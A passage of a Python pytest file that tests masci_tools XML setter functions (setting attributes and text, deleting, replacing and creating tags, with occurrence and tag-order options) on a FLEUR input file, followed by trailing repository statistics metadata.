    assert not eval_xpath(root, '/fleurInput/@TEST_ATT', list_return=True)

    tree = xml_set_attrib_value_no_create(tree, '/fleurInput', 'TEST_ATT', 2145)

    # The integer 2145 ends up serialized as the string '2145'.
    assert str(eval_xpath(root, '/fleurInput/@TEST_ATT')) == '2145'
def test_xml_set_attrib_value_no_create_errors(load_inpxml):
    """Invalid occurrences/value combinations raise and leave the tree untouched."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    mtsphere_xpath = '/fleurInput/atomSpecies/species/mtSphere'

    # Occurrence index beyond the number of matching nodes.
    with pytest.raises(ValueError, match='Wrong value for occurrences'):
        xml_set_attrib_value_no_create(tree, mtsphere_xpath, 'radius', 'test', occurrences=5)

    # More values than selected occurrences.
    with pytest.raises(ValueError, match='Wrong length for attribute values'):
        xml_set_attrib_value_no_create(tree, mtsphere_xpath, 'radius', ['test', 'too_much'], occurrences=[1])

    # Both failed calls must leave the original attributes unchanged.
    assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
# Parametrization data for test_xml_set_attrib_value_no_create_all:
# expected '@radius' values after each corresponding call below.
TEST_ATTRIB_RESULTS = [['test', 'test'], ['test', 'test2'], ['test', '2214'], ['test', '2.20000000'],
                       ['2.20000000', 'test']]
# attribv argument: a single value (applied to all selected occurrences),
# a list with one value per occurrence, or a list with mixed types.
TEST_ATTRIBV = ['test', ['test', 'test2'], ['test', 2214], 'test', ['test']]
# occurrences argument: None (all occurrences), an int index, or a list of indices.
TEST_OCCURENCES = [None, None, None, 0, [-1]]
@pytest.mark.parametrize('attribv, expected_result,occurrences',
                         zip(TEST_ATTRIBV, TEST_ATTRIB_RESULTS, TEST_OCCURENCES))
def test_xml_set_attrib_value_no_create_all(load_inpxml, attribv, expected_result, occurrences):
    """
    Test of the functionality of xml_set_attrib_value_no_create with multiple occurrences
    of the attribute and different values for occurrences.
    """
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    radius_xpath = '/fleurInput/atomSpecies/species/mtSphere/@radius'

    # Unmodified values from the test input.
    assert eval_xpath(root, radius_xpath) == ['2.20000000', '2.20000000']

    tree = xml_set_attrib_value_no_create(tree,
                                          '/fleurInput/atomSpecies/species/mtSphere',
                                          'radius',
                                          attribv,
                                          occurrences=occurrences)

    assert eval_xpath(root, radius_xpath) == expected_result
def test_xml_set_text_no_create(load_inpxml):
    """xml_set_text_no_create replaces the text of an existing tag."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    # The root tag carries no text of its own initially.
    assert eval_xpath(root, '/fleurInput').text.strip() == ''

    tree = xml_set_text_no_create(tree, '/fleurInput', 'TEST_TEXT')

    assert eval_xpath(root, '/fleurInput').text == 'TEST_TEXT'
def test_xml_set_text_no_create_errors(load_inpxml):
    """Invalid occurrences/value combinations raise and leave the texts untouched."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    kpoints_xpath = '/fleurInput/cell/bzIntegration/kPointLists/kPointList/kPoint'

    # Occurrence index beyond the number of matching nodes.
    with pytest.raises(ValueError, match='Wrong value for occurrences'):
        xml_set_text_no_create(tree, kpoints_xpath, 'test', occurrences=5)

    # More values than selected occurrences.
    with pytest.raises(ValueError, match='Wrong length for text values'):
        xml_set_text_no_create(tree, kpoints_xpath, ['test', 'too_much'], occurrences=[1])

    # Both failed calls must leave the k-point texts unchanged.
    assert eval_xpath(root, f'{kpoints_xpath}/text()') == [
        ' -0.250000 0.250000 0.000000', ' 0.250000 0.250000 0.000000'
    ]
# Parametrization data for test_xml_set_text_no_create_all:
# expected k-point text values after each corresponding call below.
TEST_TEXT_RESULTS = [['test', 'test'], ['test', 'test2'], ['test', ' 0.250000 0.250000 0.000000'],
                     [' -0.250000 0.250000 0.000000', 'test']]
# text argument: a single value (applied to all selected occurrences)
# or a list with one value per occurrence.
TEST_TEXTS = ['test', ['test', 'test2'], 'test', ['test']]
# occurrences argument: None (all occurrences), an int index, or a list of indices.
TEST_TEXT_OCCURENCES = [None, None, 0, [-1]]
@pytest.mark.parametrize('text, expected_result,occurrences', zip(TEST_TEXTS, TEST_TEXT_RESULTS, TEST_TEXT_OCCURENCES))
def test_xml_set_text_no_create_all(load_inpxml, text, expected_result, occurrences):
    """Text setting with single/list values and different occurrences selections."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    kpoints_xpath = '/fleurInput/cell/bzIntegration/kPointLists/kPointList/kPoint'

    # Unmodified k-point coordinates from the test input.
    assert eval_xpath(root, f'{kpoints_xpath}/text()') == [
        ' -0.250000 0.250000 0.000000', ' 0.250000 0.250000 0.000000'
    ]

    tree = xml_set_text_no_create(tree, kpoints_xpath, text, occurrences=occurrences)

    assert eval_xpath(root, f'{kpoints_xpath}/text()') == expected_result
def test_xml_delete_tag_single(load_inpxml):
    """xml_delete_tag removes a uniquely matching tag."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_tag

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/calculationSetup', list_return=True)) == 1

    tree = xml_delete_tag(tree, '/fleurInput/calculationSetup')

    assert not eval_xpath(root, '/fleurInput/calculationSetup', list_return=True)
def test_xml_delete_tag_multiple(load_inpxml):
    """xml_delete_tag removes every matching tag by default."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_tag

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2

    tree = xml_delete_tag(tree, '/fleurInput/atomSpecies/species')

    assert not eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)
def test_xml_delete_tag_occurrences_single(load_inpxml):
    """occurrences as an int deletes only the selected match."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_tag

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2

    tree = xml_delete_tag(tree, '/fleurInput/atomSpecies/species', occurrences=1)

    # The species at index 1 was deleted; 'Fe-1' survives.
    assert eval_xpath(root, '/fleurInput/atomSpecies/species/@name') == 'Fe-1'
def test_xml_delete_tag_occurrences_multiple(load_inpxml):
    """occurrences as a list deletes only the selected matches."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_tag

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2

    tree = xml_delete_tag(tree, '/fleurInput/atomSpecies/species', occurrences=[0])

    # The species at index 0 was deleted; 'Pt-1' survives.
    assert eval_xpath(root, '/fleurInput/atomSpecies/species/@name') == 'Pt-1'
def test_xml_delete_att_single(load_inpxml):
    """xml_delete_att removes one attribute from a uniquely matching tag."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_att

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    expected = {('Kmax', '4.00000000'), ('Gmax', '10.00000000'), ('GmaxXC', '8.70000000'), ('numbands', '0')}

    node = eval_xpath(root, '/fleurInput/calculationSetup/cutoffs')
    assert set(node.attrib.items()) == expected

    tree = xml_delete_att(tree, '/fleurInput/calculationSetup/cutoffs', 'Kmax')

    # Only 'Kmax' disappears; every other attribute stays intact.
    node = eval_xpath(root, '/fleurInput/calculationSetup/cutoffs')
    assert set(node.attrib.items()) == expected - {('Kmax', '4.00000000')}
def test_xml_delete_att_multiple(load_inpxml):
    """xml_delete_att removes the attribute from every matching tag by default."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_att

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    radius_xpath = '/fleurInput/atomSpecies/species/mtSphere/@radius'
    assert eval_xpath(root, radius_xpath) == ['2.20000000', '2.20000000']

    tree = xml_delete_att(tree, '/fleurInput/atomSpecies/species/mtSphere', 'radius')

    assert not eval_xpath(root, radius_xpath)
def test_xml_delete_att_occurrences_single(load_inpxml):
    """occurrences as an int removes the attribute from a single occurrence."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_att

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    radius_xpath = '/fleurInput/atomSpecies/species/mtSphere/@radius'
    assert eval_xpath(root, radius_xpath) == ['2.20000000', '2.20000000']

    tree = xml_delete_att(tree, '/fleurInput/atomSpecies/species/mtSphere', 'radius', occurrences=1)

    # Only one radius attribute remains, and it belongs to the 'Fe-1' species.
    assert eval_xpath(root, radius_xpath) == '2.20000000'
    assert eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Fe-1']/mtSphere/@radius") == '2.20000000'
def test_xml_delete_att_occurrences_multiple(load_inpxml):
    """occurrences as a list removes the attribute from the selected occurrences."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_delete_att

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    radius_xpath = '/fleurInput/atomSpecies/species/mtSphere/@radius'
    assert eval_xpath(root, radius_xpath) == ['2.20000000', '2.20000000']

    tree = xml_delete_att(tree, '/fleurInput/atomSpecies/species/mtSphere', 'radius', occurrences=[0])

    # Only one radius attribute remains, and it belongs to the 'Pt-1' species.
    assert eval_xpath(root, radius_xpath) == '2.20000000'
    assert eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Pt-1']/mtSphere/@radius") == '2.20000000'
def test_xml_replace_tag_single(load_inpxml):
    """xml_replace_tag swaps a uniquely matching tag for the given element."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
    from lxml import etree

    replacement = etree.Element('test_tag')
    replacement.attrib['test_attrib'] = 'test'

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/calculationSetup/cutoffs', list_return=True)) == 1

    tree = xml_replace_tag(tree, '/fleurInput/calculationSetup/cutoffs', replacement)

    # The old tag is gone and the replacement is in its place, attributes intact.
    assert not eval_xpath(root, '/fleurInput/calculationSetup/cutoffs', list_return=True)
    inserted = eval_xpath(root, '/fleurInput/calculationSetup/test_tag', list_return=True)
    assert len(inserted) == 1
    assert inserted[0].attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_multiple(load_inpxml):
    """xml_replace_tag replaces every matching tag by default."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
    from lxml import etree

    replacement = etree.Element('test_tag')
    replacement.attrib['test_attrib'] = 'test'

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2

    tree = xml_replace_tag(tree, '/fleurInput/atomSpecies/species/mtSphere', replacement)

    # Both mtSphere tags are gone; both species carry the replacement.
    assert not eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)
    inserted = eval_xpath(root, '/fleurInput/atomSpecies/species/test_tag', list_return=True)
    assert len(inserted) == 2
    for node in inserted:
        assert node.attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_occurrences_single(load_inpxml):
    """occurrences as an int replaces only the selected match."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
    from lxml import etree

    replacement = etree.Element('test_tag')
    replacement.attrib['test_attrib'] = 'test'

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2

    tree = xml_replace_tag(tree, '/fleurInput/atomSpecies/species/mtSphere', replacement, occurrences=1)

    # One mtSphere remains; the 'Pt-1' species got the replacement.
    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 1
    inserted = eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Pt-1']/test_tag")
    assert inserted.attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_occurrences_multiple(load_inpxml):
    """occurrences as a list replaces only the selected matches."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
    from lxml import etree

    replacement = etree.Element('test_tag')
    replacement.attrib['test_attrib'] = 'test'

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = tree.getroot()

    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2

    tree = xml_replace_tag(tree, '/fleurInput/atomSpecies/species/mtSphere', replacement, occurrences=[0])

    # One mtSphere remains; the 'Fe-1' species got the replacement.
    assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 1
    inserted = eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Fe-1']/test_tag")
    assert inserted.attrib.items() == [('test_attrib', 'test')]
def test_xml_create_tag_string_append(load_inpxml):
    """Passing a tag name appends a new empty element at the end of the parent."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of calculationSetup in the unmodified test input.
    tags = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
        'geometryOptimization', 'ldaU'
    ]
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == tags
    xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag')
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    # Without place_index/tag_order the new tag is appended last.
    tags.append('test_tag')
    assert [child.tag for child in node.iterchildren()] == tags
def test_xml_create_tag_element_append(load_inpxml):
    """Passing an lxml Element appends that element, keeping its attributes."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    from lxml import etree
    new_element = etree.Element('test_tag')
    new_element.attrib['test_attrib'] = 'test'
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of calculationSetup in the unmodified test input.
    tags = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
        'geometryOptimization', 'ldaU'
    ]
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == tags
    xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', new_element)
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    # Without place_index/tag_order the new element is appended last.
    tags.append('test_tag')
    assert [child.tag for child in node.iterchildren()] == tags
    # The inserted element keeps its attributes.
    assert [child.attrib.items() for child in node.iterchildren()][-1] == [('test_attrib', 'test')]
def test_xml_create_tag_insert_first(load_inpxml):
    """place_index=0 inserts the new tag as the first child of the parent."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of calculationSetup in the unmodified test input.
    tags = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
        'geometryOptimization', 'ldaU'
    ]
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == tags
    xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', place_index=0)
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    # test_tag now leads the children list.
    assert [child.tag for child in node.iterchildren()] == [
        'test_tag', 'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis',
        'expertModes', 'geometryOptimization', 'ldaU'
    ]
def test_xml_create_tag_insert_middle(load_inpxml):
    """place_index inserts the new tag at the given child position."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of calculationSetup in the unmodified test input.
    tags = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
        'geometryOptimization', 'ldaU'
    ]
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == tags
    xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', place_index=5)
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    # test_tag sits at index 5, between magnetism and soc.
    assert [child.tag for child in node.iterchildren()] == [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'test_tag', 'soc', 'prodBasis',
        'expertModes', 'geometryOptimization', 'ldaU'
    ]
def test_xml_create_tag_tag_order_all_single(load_inpxml):
    """tag_order places the new tag at its position in the given order list."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of calculationSetup in the unmodified test input.
    tags = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
        'geometryOptimization', 'ldaU'
    ]
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == tags
    # Desired order: the existing children plus test_tag between magnetism and soc.
    order = [
        'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'test_tag', 'soc', 'prodBasis',
        'expertModes', 'geometryOptimization', 'ldaU'
    ]
    xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', tag_order=order)
    node = eval_xpath(root, '/fleurInput/calculationSetup')
    assert [child.tag for child in node.iterchildren()] == order
def test_xml_create_tag_tag_order_multiple(load_inpxml):
    """With tag_order the new tag is inserted at its place in every matching parent."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of the two species tags in the unmodified test input
    # (first species has two lo tags, second only one).
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
    order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']
    xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)
    # test_tag now precedes energyParameters in both species.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'test_tag',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_selection(load_inpxml):
    """A more specific xpath restricts the insertion to the selected parent only."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of the two species tags in the unmodified test input.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
    order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']
    # Only the 'Fe-1' species is selected by the xpath.
    xmltree = xml_create_tag(xmltree, "/fleurInput/atomSpecies/species[@name='Fe-1']", 'test_tag', tag_order=order)
    # The first species gains test_tag; the second is untouched.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'test_tag',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_beginning(load_inpxml):
    """tag_order can place the new tag before all existing children."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of the two species tags in the unmodified test input.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
    # test_tag comes first in the desired order.
    order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
    xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)
    # Both species now start with test_tag.
    tags = [[
        'test_tag',
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_occurrences_single(load_inpxml):
    """occurrences as an int restricts the tag_order insertion to one parent."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of the two species tags in the unmodified test input.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
    order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
    xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order, occurrences=0)
    # Only the first species (index 0) gains test_tag.
    tags = [[
        'test_tag',
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_occurrences_list(load_inpxml):
    """occurrences as a list (with negative indexing) selects the parents to modify."""
    from masci_tools.util.xml.common_functions import eval_xpath
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # Children of the two species tags in the unmodified test input.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
    order = ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
    xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order, occurrences=[-1])
    # Only the last species (index -1) gains test_tag.
    tags = [[
        'mtSphere',
        'atomicCutoffs',
        'electronConfig',
        'energyParameters',
        'lo',
        'lo',
    ], ['test_tag', 'mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_errors(load_inpxml):
    """xml_create_tag raises for missing parents and inconsistent tag_order lists."""
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag

    tree, _ = load_inpxml(TEST_INPXML_PATH, absolute=False)

    # Parent xpath matches nothing.
    with pytest.raises(ValueError, match=r"Could not create tag 'test_tag' because atleast one subtag is missing."):
        xml_create_tag(tree, '/fleurInput/calculationSetup/not_existent', 'test_tag')

    # The new tag does not appear in the given order list.
    order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
    with pytest.raises(ValueError, match=r"The tag 'test_tag' was not found in the order list"):
        xml_create_tag(tree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)

    # An existing child (mtSphere) is missing from the order list.
    order = ['atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']
    with pytest.raises(ValueError, match=r"Did not find existing elements in the tag_order list: {'mtSphere'}"):
        xml_create_tag(tree, '/fleurInput/atomSpecies/species', 'lo', tag_order=order)
def test_xml_create_tag_misaligned_order(load_inpxml):
    """
    Test automatic correction of a misaligned existing order in xml_create_tag
    """
    from masci_tools.util.xml.xml_setters_basic import xml_create_tag
    from masci_tools.util.xml.common_functions import eval_xpath
    xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
    root = xmltree.getroot()
    # This creates an invalid order: the appended ldaU lands after the lo tags,
    # while the order list below requires ldaU before lo.
    xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU')
    xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'lo')
    order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'lo']
    # With correct_order=False a misaligned existing order is a hard error.
    with pytest.raises(ValueError, match=r'Existing order does not correspond to tag_order list'):
        xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU', tag_order=order, correct_order=False)
    # By default the existing order is corrected, emitting a warning.
    with pytest.warns(UserWarning, match=r'Existing order does not correspond to tag_order list. Correcting it'):
        xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'ldaU', tag_order=order)
    # After correction all ldaU tags precede all lo tags in both species.
    tags = [['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'ldaU', 'lo', 'lo', 'lo'],
            ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'ldaU', 'ldaU', 'lo', 'lo']]
    nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
    assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
| 38.038058
| 119
| 0.703743
| 3,509
| 28,985
| 5.551439
| 0.054716
| 0.042967
| 0.042043
| 0.056366
| 0.944969
| 0.921715
| 0.895021
| 0.877207
| 0.833316
| 0.81268
| 0
| 0.015788
| 0.171813
| 28,985
| 761
| 120
| 38.088042
| 0.795709
| 0.016146
| 0
| 0.702355
| 0
| 0
| 0.262654
| 0.121636
| 0
| 0
| 0
| 0
| 0.143469
| 1
| 0.066381
| false
| 0
| 0.143469
| 0
| 0.20985
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c7d5bce714a2763fad5a5b2a66f286eed04f846
| 15,474
|
py
|
Python
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
c0417928b6351035bb5da891e7dea86d3445e0cf
|
[
"MIT"
] | 697
|
2016-11-23T01:54:56.000Z
|
2022-03-28T22:31:43.000Z
|
sample_data/base/gendata.py
|
bennettwarner/DPAT
|
